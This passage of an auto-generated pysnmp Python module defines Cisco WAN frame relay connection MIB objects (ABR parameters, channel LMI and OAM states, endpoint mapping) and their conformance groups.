if mibBuilder.loadTexts: frChanSlaveType.setStatus('current')
if mibBuilder.loadTexts: frChanSlaveType.setDescription("This object is added for FRSM12 card. This object indicates whether a master endpoint has a persistent slave or not. A connection with a master and a non-persistent slave is considered a single-ended SPVC. This object is only meaningful when 'frMastership' contains the value of 'master(1)'. And this variable must be used with 'frMastership' to decide if a connection is single-ended or not. This object is not applicable to MGX Release 1.x.")
frConnRemoteMBS = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 71), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 5000000)).clone(1024)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnRemoteMBS.setStatus('current')
if mibBuilder.loadTexts: frConnRemoteMBS.setDescription("Remote Maximum Burst Size in terms of number of cells. This object should be set by the user in cases when the remote end of the connection is an ATM end-point where the Local MBS can be explicitly specified. In such cases, this element should be set to be equal to the remote end-point's local MBS. This object is not applicable to MGX Release 1.x. ")
frChanPrefRouteId = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 72), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanPrefRouteId.setStatus('current')
if mibBuilder.loadTexts: frChanPrefRouteId.setDescription("This object serves to associate a preferred route with a connection. The value '0' means no preferred route is associated with this connection. Usage: - If the value of this object is set to 0, the object frChanDirectRoute is automatically set to FALSE by the switch. - The preferred route is defined in the cwaPrefRouteConfTable object.")
frChanDirectRoute = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 73), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanDirectRoute.setStatus('current')
if mibBuilder.loadTexts: frChanDirectRoute.setDescription('This object serves to associate a preferred route as a directed route (corresponding to the preferred route object frChanPrefRouteId). A directed route specifies that the associated preferred route is the only permissible route for the connection to take. Should the associated preferred route be unavailable, the connection is failed. The object is not applicable if there is no associated preferred route with the connection.')
chanNumNextAvailable = MibScalar((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(16, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanNumNextAvailable.setStatus('current')
if mibBuilder.loadTexts: chanNumNextAvailable.setDescription("This variable contains the next UNUSED channel number of the maximum possible value(depends upon the service module). This number can be used in channel config table, the ChanNumNextAvailable gets updated if the number gets used to create a logical channel. A '0' indicates that no more channels are available. For FRSM12 Card: Not Supported.")
frstdABRCnfGrpTable = MibTable((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3), )
if mibBuilder.loadTexts: frstdABRCnfGrpTable.setStatus('current')
if mibBuilder.loadTexts: frstdABRCnfGrpTable.setDescription('This table is used for configuring ABR parameters on a frame relay connection. ')
frstdABRCnfGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1), ).setIndexNames((0, "CISCO-WAN-FR-CONN-MIB", "frstdABRcnfChanNum"))
if mibBuilder.loadTexts: frstdABRCnfGrpEntry.setStatus('current')
if mibBuilder.loadTexts: frstdABRCnfGrpEntry.setDescription('An entry in ABR Configuration table.')
frstdABRcnfChanNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: frstdABRcnfChanNum.setStatus('current')
if mibBuilder.loadTexts: frstdABRcnfChanNum.setDescription('Refers to the virtual connection index. The value supported depends upon the type of service module. Supported Range for different Card Types: FRSM-4T1/E1 : supported range is 16..271 (256 entries) FRSM-8T1/E1 : supported range is 16..1015 (1000 entries) FRSM-T3/E3/HS2/ /HS2B-HSSI/T3B/E3B : supported range is 16..2015 (2000 entries) FRSM-2CT3/HS2B-12IN1: supported range is 16..4015 (4000 entries) FRSM12 Card: Byte 3 = Chassis Number, Byte 2 = Slot Number, Byte 1 & 0 = channel Number. Lower two bytes range from 16..16015 (16000 entries) ')
frstdABRTBE = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215)).clone(16777215)).setUnits('cells').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRTBE.setStatus('current')
if mibBuilder.loadTexts: frstdABRTBE.setDescription('The value of this object is equal to Transient Buffer Exposure(TBE). The TBE is a negotiated number of cells that the network would like to limit the source to sending during startup periods, before the first RM-cell returns.')
frstdABRFRTT = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16700))).setUnits('milli-seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRFRTT.setStatus('current')
if mibBuilder.loadTexts: frstdABRFRTT.setDescription('The value of this object is equal to Fixed Round-Trip Time(FRTT). The FRTT is the sum of the fixed propagation delays from the source to a destination network. The value 0 signifies that FRTT is not available.')
frstdABRRDF = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 32768)).clone(16)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRRDF.setStatus('current')
if mibBuilder.loadTexts: frstdABRRDF.setDescription('The value of this object is equal to Rate Decrease Factor(RDF). The RDF controls the rate decrease which occurs when backward RM-cells with CI=1 are received. Larger values lead to faster rate decrease. The value specified has to be inverted to arrive at the actual value. The valid values possible are only powers of 2; i.e. 1, 2, 4, 8 ..... 32768. The SNMP agent has to verify this compliance.')
frstdABRRIF = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 32768)).clone(64)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRRIF.setStatus('current')
if mibBuilder.loadTexts: frstdABRRIF.setDescription('The value of this object is equal to Rate Increase Factor(RIF). The RIF controls the rate increase which occurs when a backward RM-cell is received with CI=0 and NI=0. The value specified has to be inverted to arrive at the actual value. The valid values possible are only powers of 2; i.e. 1, 2, 4, 8 ..... 32768. The SNMP agent has to verify this compliance.')
frstdABRNrm = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2, 256)).clone(64)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRNrm.setStatus('current')
if mibBuilder.loadTexts: frstdABRNrm.setDescription('The value of this object is equal to number of cells a source may send for each forward RM cell. The valid values possible are only powers of 2 starting from 2; i.e. 2, 4, 8 ..... 256. The SNMP agent has to verify this compliance.')
frstdABRTrm = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(3, 255)).clone(255)).setUnits('milli-seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRTrm.setStatus('current')
if mibBuilder.loadTexts: frstdABRTrm.setDescription('The value of this object is equal to Upper bound on the time between forward RM cells for an active source.')
frstdABRCDF = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 64)).clone(16)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRCDF.setStatus('current')
if mibBuilder.loadTexts: frstdABRCDF.setDescription('The value of this object is equal to Cutoff Decrease Factor(CDF). The value specified has to be inverted to arrive at the actual value. The valid values possible are 0 and only powers of 2; i.e., 1, 2, 4, 8, 16, 32, 64. The SNMP agent has to verify this compliance.')
frstdABRADTF = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 10230)).clone(500)).setUnits('milli-seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRADTF.setStatus('current')
if mibBuilder.loadTexts: frstdABRADTF.setDescription('The value of this object is equal to ACR Decrease Time Factor(ADTF). The Granularity allowed is 10 milli seconds. i.e. 10,20,30 etc. The SNMP agent has to verify this compliance.')
frstdABRICR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 400000)).clone(10)).setUnits('cells-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRICR.setStatus('current')
if mibBuilder.loadTexts: frstdABRICR.setDescription('The value of this object is equal to Initial Cell Rate(ICR). The ICR is the rate at which the source should send initially and after an idle period. This includes the bandwidth allocated for both data cells as well as all in-rate RM cells.')
frstdABRMCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 400000)).clone(10)).setUnits('cells-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRMCR.setStatus('current')
if mibBuilder.loadTexts: frstdABRMCR.setDescription('The value of this object is equal to Minimum Cell Rate(MCR). The MCR is the rate at which the source is allowed to send. This includes the bandwidth allocated for both data cells as well as all in-rate RM cells.')
frstdABRPCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 400000)).clone(10)).setUnits('cells-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRPCR.setStatus('current')
if mibBuilder.loadTexts: frstdABRPCR.setDescription('The value of this object is equal to Peak Cell Rate(PCR). The PCR is the rate at which the source is allowed to send. This includes the bandwidth allocated for both data cells as well as all in-rate RM cells.')
frChanStateGrp = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2))
frChanStateGrpTable = MibTable((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1), )
if mibBuilder.loadTexts: frChanStateGrpTable.setStatus('current')
if mibBuilder.loadTexts: frChanStateGrpTable.setDescription('Table of transmit/receive states of channels.')
frChanStateGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1), ).setIndexNames((0, "CISCO-WAN-FR-CONN-MIB", "stateChanNum"))
if mibBuilder.loadTexts: frChanStateGrpEntry.setStatus('current')
if mibBuilder.loadTexts: frChanStateGrpEntry.setDescription('An entry for FrChannelStateGrpEntry.')
stateChanNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: stateChanNum.setStatus('current')
if mibBuilder.loadTexts: stateChanNum.setDescription("The value of this object refers to frame relay connection. The value must be same as the value of the object 'chanNum' in frChanCnfGrpTable.")
chanState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notConfigured", 1), ("okay", 2), ("alarm", 3), ("failed", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanState.setStatus('current')
if mibBuilder.loadTexts: chanState.setDescription('This variable indicates the LMI state of the VC (channel). The possible values are : notConfigured(1): Connection Not configured okay(2) : Connection is in Ok state alarm(3) : Connection is in alarm failed(4) : Connection is in failed state. This is applicable only for PNNI.')
xmtAbitState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("sendingAequal1", 2), ("sendingAequal0", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: xmtAbitState.setStatus('current')
if mibBuilder.loadTexts: xmtAbitState.setDescription('The value of this object identifies the A bit transmit state. The possible values are : off(1) : LMI is off sendingAequal1(2) : LMI is on and connection is O.K. sendingAequal0(3) : LMI is on and connection is failed.')
rcvAbitState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("rcvingAequal1", 2), ("rcvingAequal0", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rcvAbitState.setStatus('current')
if mibBuilder.loadTexts: rcvAbitState.setDescription('The value of this object identifies the A bit receive state. The possible values are : off(1) : LMI is off rcvingAequal1(2) : LMI is on and connection is O.K. rcvingAequal0(3) : LMI is on and connection is failed.')
xmtATMState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("notSending", 1), ("sendingAIS", 2), ("sendingFERF", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: xmtATMState.setStatus('current')
if mibBuilder.loadTexts: xmtATMState.setDescription('This variable indicates the transmit state of the VC (channel) on the ATM side. The possible values are : notSending(1) : Not sending any state sendingAIS(2) : Sending AIS OAM state sendingFERF(3) : Sending FERF OAM state.')
rcvATMState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("notRcving", 1), ("rcvingAIS", 2), ("rcvingFERF", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rcvATMState.setStatus('current')
if mibBuilder.loadTexts: rcvATMState.setDescription('This variable indicates the receive state of the VC (channel) on the ATM side. The possible values are : notRcving(1) : Not receiving any state rcvingAIS(2) : Receiving AIS OAM rcvingFERF(3) : Receiving FERF OAM.')
chanStatusBitMap = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanStatusBitMap.setStatus('current')
if mibBuilder.loadTexts: chanStatusBitMap.setDescription('This variable indicates the consolidated bit map of the channel alarm state. Individual bit positions are as defined below. Bit position Fail/Alarm Reason ------------ ---------- ------ 0 Alarm Reserved 1 Alarm n/w side AIS/RDI Rx 2 Fail Conditioned(A bit from n/w) 3 Alarm Reserved 4 Fail CC failed/RAS failed 5 Fail Mismatch 6 Alarm ingress A bit (LMI) 7 Alarm Reserved Fail bitmap mask : 0x34 Alarm bitmap mask: 0xCB This object is not applicable to MGX Release 1.x. ')
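# Illustrative helper (not part of the generated MIB): decode a chanStatusBitMap
# value using the fail/alarm masks quoted in the description above (fail mask
# 0x34, alarm mask 0xCB). Shown only to clarify the bitmap semantics.
def _chanStatusBitMapFlags(bitmap):
    return {'failed': bool(bitmap & 0x34), 'alarm': bool(bitmap & 0xCB)}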
frEndPtMapGrp = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3))
frEndPtMapGrpTable = MibTable((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1), )
if mibBuilder.loadTexts: frEndPtMapGrpTable.setStatus('current')
if mibBuilder.loadTexts: frEndPtMapGrpTable.setDescription('This is the Endpoint Mapping table for Frame Relay connections.')
frEndPtMapGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1, 1), ).setIndexNames((0, "CISCO-WAN-FR-CONN-MIB", "endPortNum"), (0, "CISCO-WAN-FR-CONN-MIB", "endDLCI"))
if mibBuilder.loadTexts: frEndPtMapGrpEntry.setStatus('current')
if mibBuilder.loadTexts: frEndPtMapGrpEntry.setDescription('An entry in the frame relay connection Endpoint table.')
endPortNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: endPortNum.setStatus('current')
if mibBuilder.loadTexts: endPortNum.setDescription("This object identifies the frame relay logical port. The value for this object must be the same as the 'portNum' object in frPortCnfPortGrpTable. If ifTable is implemented in a service module, this object must be the same as the ifIndex of the frame relay port.")
endDLCI = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8388607))).setMaxAccess("readonly")
if mibBuilder.loadTexts: endDLCI.setStatus('current')
if mibBuilder.loadTexts: endDLCI.setDescription('The value of this object is equal to the DLCI value for this PVC endpoint.')
endChanNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: endChanNum.setStatus('current')
if mibBuilder.loadTexts: endChanNum.setDescription("The value of this object identifies the frame relay connection number. The value of this object is same as the value of 'chanNum' object in frChanCnfGrpTable. This object contains value 0, if port.dlci is a multicast group.")
endLineNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: endLineNum.setStatus('current')
if mibBuilder.loadTexts: endLineNum.setDescription('The value of this object is equal to the physical line (for example T1/E1) or ifIndex on which the connection is provisioned. If ifTable is not implemented in a service module, then the range is from 1 to the maximum number of lines supported. If ifTable is implemented in a service module, this object must be the same as the ifIndex of the interface (ifType=ds1(18),ds3(30)). The value supported for this object depends upon the type of service module: FRSM-4T1/E1 : Range is from 1..4 FRSM-8T1/E1 : Range is from 1..8 FRSM-T3/E3/HS2: Range is from 1..2 FRSM-2CT3 : Range is from 1..56 with ifTable Support: must refer to ifIndex of the interface. ')
ciscoWanFrConnMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 47, 2))
ciscoWanFrConnMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1))
ciscoWanFrConnMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 2))
ciscoWanFrConnCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 2, 1)).setObjects(("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnTestGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnStateGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnEndptGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnABRGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnForesightGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnQueueGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnCompliance = ciscoWanFrConnCompliance.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnCompliance.setDescription('The compliance statement for SNMP entities which support the Frame relay connection MIB.')
ciscoWanFrConnGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 1)).setObjects(("CISCO-WAN-FR-CONN-MIB", "chanNum"), ("CISCO-WAN-FR-CONN-MIB", "chanRowStatus"), ("CISCO-WAN-FR-CONN-MIB", "chanPortNum"), ("CISCO-WAN-FR-CONN-MIB", "dLCI"), ("CISCO-WAN-FR-CONN-MIB", "egressQSelect"), ("CISCO-WAN-FR-CONN-MIB", "deTaggingEnable"), ("CISCO-WAN-FR-CONN-MIB", "cir"), ("CISCO-WAN-FR-CONN-MIB", "bc"), ("CISCO-WAN-FR-CONN-MIB", "be"), ("CISCO-WAN-FR-CONN-MIB", "ibs"), ("CISCO-WAN-FR-CONN-MIB", "chanLocRmtLpbkState"), ("CISCO-WAN-FR-CONN-MIB", "chanType"), ("CISCO-WAN-FR-CONN-MIB", "chanFECNconfig"), ("CISCO-WAN-FR-CONN-MIB", "chanDEtoCLPmap"), ("CISCO-WAN-FR-CONN-MIB", "chanCLPtoDEmap"), ("CISCO-WAN-FR-CONN-MIB", "chanIngrPercentUtil"), ("CISCO-WAN-FR-CONN-MIB", "chanEgrPercentUtil"), ("CISCO-WAN-FR-CONN-MIB", "chanEgrSrvRate"), ("CISCO-WAN-FR-CONN-MIB", "chanOvrSubOvrRide"), ("CISCO-WAN-FR-CONN-MIB", "chanFrConnType"), ("CISCO-WAN-FR-CONN-MIB", "frCDRNumber"), ("CISCO-WAN-FR-CONN-MIB", "frLocalVpi"), ("CISCO-WAN-FR-CONN-MIB", "frLocalVci"), ("CISCO-WAN-FR-CONN-MIB", "frLocalNSAP"), ("CISCO-WAN-FR-CONN-MIB", "frRemoteVpi"), ("CISCO-WAN-FR-CONN-MIB", "frRemoteVci"), ("CISCO-WAN-FR-CONN-MIB", "frRemoteNSAP"), ("CISCO-WAN-FR-CONN-MIB", "frMastership"), ("CISCO-WAN-FR-CONN-MIB", "frVpcFlag"), ("CISCO-WAN-FR-CONN-MIB", "frConnServiceType"), ("CISCO-WAN-FR-CONN-MIB", "frRoutingPriority"), ("CISCO-WAN-FR-CONN-MIB", "frMaxCost"), ("CISCO-WAN-FR-CONN-MIB", "frRestrictTrunkType"), ("CISCO-WAN-FR-CONN-MIB", "frConnPCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnRemotePCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnMCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnRemoteMCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnPercentUtil"), ("CISCO-WAN-FR-CONN-MIB", "frConnRemotePercentUtil"), ("CISCO-WAN-FR-CONN-MIB", "frConnForeSightEnable"), ("CISCO-WAN-FR-CONN-MIB", "frConnFGCRAEnable"), ("CISCO-WAN-FR-CONN-MIB", "chanServType"), ("CISCO-WAN-FR-CONN-MIB", "chanServiceRateOverride"), ("CISCO-WAN-FR-CONN-MIB", "chanServiceRate"), ("CISCO-WAN-FR-CONN-MIB", "zeroCirConEir"), ("CISCO-WAN-FR-CONN-MIB", "chanReroute"), ("CISCO-WAN-FR-CONN-MIB", "frConnSCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnRemoteSCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnTemplateId"), ("CISCO-WAN-FR-CONN-MIB", "frConnAdminStatus"), ("CISCO-WAN-FR-CONN-MIB", "frChanCnfChangeCount"), ("CISCO-WAN-FR-CONN-MIB", "frChanCnfIgnoreIncomingDE"), ("CISCO-WAN-FR-CONN-MIB", "frChanOamCCEnable"), ("CISCO-WAN-FR-CONN-MIB", "frChanStatsEnable"), ("CISCO-WAN-FR-CONN-MIB", "frChanLocalLpbkEnable"), ("CISCO-WAN-FR-CONN-MIB", "frChanUpcEnable"), ("CISCO-WAN-FR-CONN-MIB", "frChanSlaveType"), ("CISCO-WAN-FR-CONN-MIB", "frConnRemoteMBS"), ("CISCO-WAN-FR-CONN-MIB", "chanNumNextAvailable"), ("CISCO-WAN-FR-CONN-MIB", "frChanPrefRouteId"), ("CISCO-WAN-FR-CONN-MIB", "frChanDirectRoute"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnGroup = ciscoWanFrConnGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnGroup.setDescription('A collection of objects providing information applicable to a Frame Relay Connection.')
ciscoWanFrConnForesightGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 2)).setObjects(("CISCO-WAN-FR-CONN-MIB", "foreSightEnable"), ("CISCO-WAN-FR-CONN-MIB", "qir"), ("CISCO-WAN-FR-CONN-MIB", "mir"), ("CISCO-WAN-FR-CONN-MIB", "pir"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnForesightGroup = ciscoWanFrConnForesightGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnForesightGroup.setDescription('A collection of objects related to the foresight feature of a frame relay connection.')
ciscoWanFrConnQueueGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 3)).setObjects(("CISCO-WAN-FR-CONN-MIB", "ingressQDepth"), ("CISCO-WAN-FR-CONN-MIB", "ingressQDEThresh"), ("CISCO-WAN-FR-CONN-MIB", "ingressQECNThresh"), ("CISCO-WAN-FR-CONN-MIB", "egressQDepth"), ("CISCO-WAN-FR-CONN-MIB", "egressQDEThresh"), ("CISCO-WAN-FR-CONN-MIB", "egressQECNThresh"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnQueueGroup = ciscoWanFrConnQueueGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnQueueGroup.setDescription('A collection of objects related to queue depth egress/ingress thresholds.')
ciscoWanFrConnTestGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 4)).setObjects(("CISCO-WAN-FR-CONN-MIB", "chanTestType"), ("CISCO-WAN-FR-CONN-MIB", "chanTestState"), ("CISCO-WAN-FR-CONN-MIB", "chanRTDResult"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnTestGroup = ciscoWanFrConnTestGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnTestGroup.setDescription('A collection of objects related to testing Frame relay connections.')
ciscoWanFrConnStateGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 5)).setObjects(("CISCO-WAN-FR-CONN-MIB", "stateChanNum"), ("CISCO-WAN-FR-CONN-MIB", "chanState"), ("CISCO-WAN-FR-CONN-MIB", "xmtAbitState"), ("CISCO-WAN-FR-CONN-MIB", "rcvAbitState"), ("CISCO-WAN-FR-CONN-MIB", "xmtATMState"), ("CISCO-WAN-FR-CONN-MIB", "rcvATMState"), ("CISCO-WAN-FR-CONN-MIB", "chanStatusBitMap"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnStateGroup = ciscoWanFrConnStateGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnStateGroup.setDescription('A collection of objects related to state of Frame Relay connections.')
ciscoWanFrConnEndptGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 6)).setObjects(("CISCO-WAN-FR-CONN-MIB", "endPortNum"), ("CISCO-WAN-FR-CONN-MIB", "endDLCI"), ("CISCO-WAN-FR-CONN-MIB", "endChanNum"), ("CISCO-WAN-FR-CONN-MIB", "endLineNum"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnEndptGroup = ciscoWanFrConnEndptGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnEndptGroup.setDescription('A collection of objects related to Endpoint mapping in Frame Relay Connections.')
ciscoWanFrConnABRGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 7)).setObjects(("CISCO-WAN-FR-CONN-MIB", "frstdABRcnfChanNum"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRTBE"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRFRTT"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRRDF"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRRIF"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRNrm"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRTrm"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRCDF"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRADTF"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRICR"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRMCR"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRPCR"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnABRGroup = ciscoWanFrConnABRGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnABRGroup.setDescription('A collection of objects related to ABR in a frame relay connection.')
